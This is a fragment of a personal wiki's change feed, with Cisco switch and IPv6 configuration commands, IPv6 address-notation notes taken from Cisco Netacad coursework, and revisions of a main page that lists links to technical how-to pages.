Configure the interface &amp;quot;vlan 1&amp;quot;&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;fa0/1&amp;quot;&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
&lt;br /&gt;
Configure the range of interfaces fa0/2 to fa0/3&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
&lt;br /&gt;
Enter vlan configuration mode&lt;br /&gt;
 vlan 1&lt;br /&gt;
&lt;br /&gt;
====Vlan Configuration Commands====&lt;br /&gt;
Set vlan name&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&lt;br /&gt;
====Console or VTY line configuration commands====&lt;br /&gt;
Add a password to console port access&lt;br /&gt;
 password itsasecret&lt;br /&gt;
&lt;br /&gt;
Force users to enter the password to login&lt;br /&gt;
 login&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Interface configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set the interface to a specific vlan (Alt)&lt;br /&gt;
 encapsulation dot1q 10&lt;br /&gt;
&lt;br /&gt;
Set the interface to a specific vlan&lt;br /&gt;
 switchport mode access ! disable trunking, default is switchport mode auto&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
Set an interface to trunk mode&lt;br /&gt;
 switchport trunk encapsulation dot1q ! switches off the legacy cisco trunking protocol, not needed on newer switches&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
Change allowed vlans on trunk interface&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
Set native vlan on a trunk interface&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
Set an IPv4 address on the interface&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
Change interface state to &amp;quot;up&amp;quot;&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Ipv6 Interface Commands=====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set an IPv6 address on the interface&lt;br /&gt;
 ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Set a link-local address on the interface&lt;br /&gt;
  ipv6 addr fe80::1 link-local&lt;br /&gt;
&lt;br /&gt;
Remove an IPv6 address on the interface&lt;br /&gt;
 no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Remove all IPv6 addresses on the interface&lt;br /&gt;
 no ipv6 address&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1025</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1025"/>
		<updated>2026-01-12T19:52:08Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf pdf] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf pdf] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cisco: | [[Cisco Commands|Commands]] | [[Cisco Keyboard Shortcuts|Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) |&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes kirb.feels archive] [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=988</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=988"/>
		<updated>2025-11-17T20:39:00Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf pdf] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf pdf] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cisco: | [[Cisco Commands|Commands]] | [[Cisco Keyboard Shortcuts|Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes kirb.feels archive] [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Ipv6&amp;diff=979</id>
		<title>Ipv6</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Ipv6&amp;diff=979"/>
		<updated>2025-11-03T18:45:12Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Here is a pdf that offers a great explanation of ipv6, pulled from a cisco netacad textbook: [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/ipv6%20shortcuts.pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In order for ipv6 to work on a cisco router, you may need to enable ipv6 by typing &amp;lt;code&amp;gt;ipv6 unicast routing&amp;lt;/code&amp;gt; [[Cisco_Commands#Enable ipv6 routing]]&lt;br /&gt;
&lt;br /&gt;
Preferred Format&lt;br /&gt;
&lt;br /&gt;
The previous figure also shows that the preferred format for writing an IPv6 address is &amp;lt;code&amp;gt;x:x:x:x:x:x:x:x&amp;lt;/code&amp;gt;, with each &amp;lt;code&amp;gt;x&amp;lt;/code&amp;gt; consisting of four hexadecimal values. The term octet refers to the eight bits of an IPv4 address. In IPv6, a hextet is the unofficial term used to refer to a segment of 16 bits, or four hexadecimal values. Each &amp;lt;code&amp;gt;x&amp;lt;/code&amp;gt; is a single hextet which is 16 bits or four hexadecimal digits.&lt;br /&gt;
&lt;br /&gt;
Preferred format means that you write IPv6 address using all 32 hexadecimal digits. It does not necessarily mean that it is the ideal method for representing the IPv6 address. In this module, you will see two rules that help to reduce the number of digits needed to represent an IPv6 address.&lt;br /&gt;
&lt;br /&gt;
These are examples of IPv6 addresses in the preferred format.&lt;br /&gt;
&lt;br /&gt;
  2001 : 0db8 : 0000 : 1111 : 0000 : 0000 : 0000: 0200  &lt;br /&gt;
  2001 : 0db8 : 0000 : 00a3 : abcd : 0000 : 0000: 1234  &lt;br /&gt;
  2001 : 0db8 : 000a : 0001 : c012 : 9aff : fe9a: 19ac  &lt;br /&gt;
  2001 : 0db8 : aaaa : 0001 : 0000 : 0000 : 0000: 0000  &lt;br /&gt;
  fe80 : 0000 : 0000 : 0000 : 0123 : 4567 : 89ab: cdef  &lt;br /&gt;
  fe80 : 0000 : 0000 : 0000 : 0000 : 0000 : 0000: 0001  &lt;br /&gt;
  fe80 : 0000 : 0000 : 0000 : c012 : 9aff : fe9a: 19ac  &lt;br /&gt;
  fe80 : 0000 : 0000 : 0000 : 0123 : 4567 : 89ab: cdef  &lt;br /&gt;
  0000 : 0000 : 0000 : 0000 : 0000 : 0000 : 0000: 0001  &lt;br /&gt;
  0000 : 0000 : 0000 : 0000 : 0000 : 0000 : 0000: 0000  &lt;br /&gt;
&lt;br /&gt;
The first rule to help reduce the notation of IPv6 addresses is to omit any leading 0s (zeros) in any hextet. Here are four examples of ways to omit leading zeros:&lt;br /&gt;
&lt;br /&gt;
    01ab can be represented as 1ab&lt;br /&gt;
    09f0 can be represented as 9f0&lt;br /&gt;
    0a00 can be represented as a00&lt;br /&gt;
    00ab can be represented as ab&lt;br /&gt;
&lt;br /&gt;
This rule only applies to leading 0s, NOT to trailing 0s, otherwise the address would be ambiguous. For example, the hextet &amp;lt;code&amp;gt;abc&amp;lt;/code&amp;gt; could be either &amp;lt;code&amp;gt;0abc&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;abc0&amp;lt;/code&amp;gt;, but these do not represent the same value.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The second rule to help reduce the notation of IPv6 addresses is that a double colon (::) can replace any single, contiguous string of one or more 16-bit hextets consisting of all zeros. For example, &amp;lt;code&amp;gt;2001:db8:cafe:1:0:0:0:1&amp;lt;/code&amp;gt; (leading 0s omitted) could be represented as &amp;lt;code&amp;gt;2001:db8:cafe:1::1.&amp;lt;/code&amp;gt; The double colon (::) is used in place of the three all-0 hextets (&amp;lt;code&amp;gt;0:0:0&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
The double colon (::) can only be used once within an address, otherwise there would be more than one possible resulting address. When used with the omitting leading 0s technique, the notation of IPv6 address can often be greatly reduced. This is commonly known as the compressed format.&lt;br /&gt;
&lt;br /&gt;
Here is an example of the incorrect use of the double colon: &amp;lt;code&amp;gt;2001:db8::abcd::1234&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
The double colon is used twice in the example above. Here are the possible expansions of this incorrect compressed format address:&lt;br /&gt;
&lt;br /&gt;
    2001:db8::abcd:0000:0000:1234&lt;br /&gt;
    2001:db8::abcd:0000:0000:0000:1234&lt;br /&gt;
    2001:db8:0000:abcd::1234&lt;br /&gt;
    2001:db8:0000:0000:abcd::1234&lt;br /&gt;
&lt;br /&gt;
If an address has more than one contiguous string of all-0 hextets, best practice is to use the double colon (::) on the longest string. If the strings are equal, the first string should use the double colon (::).&lt;br /&gt;
Omitting Leading 0s and All 0 Segments&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Sources&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Cisco Netacad CCNA 1 module 12: Ipv6 Addressing&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
</feed>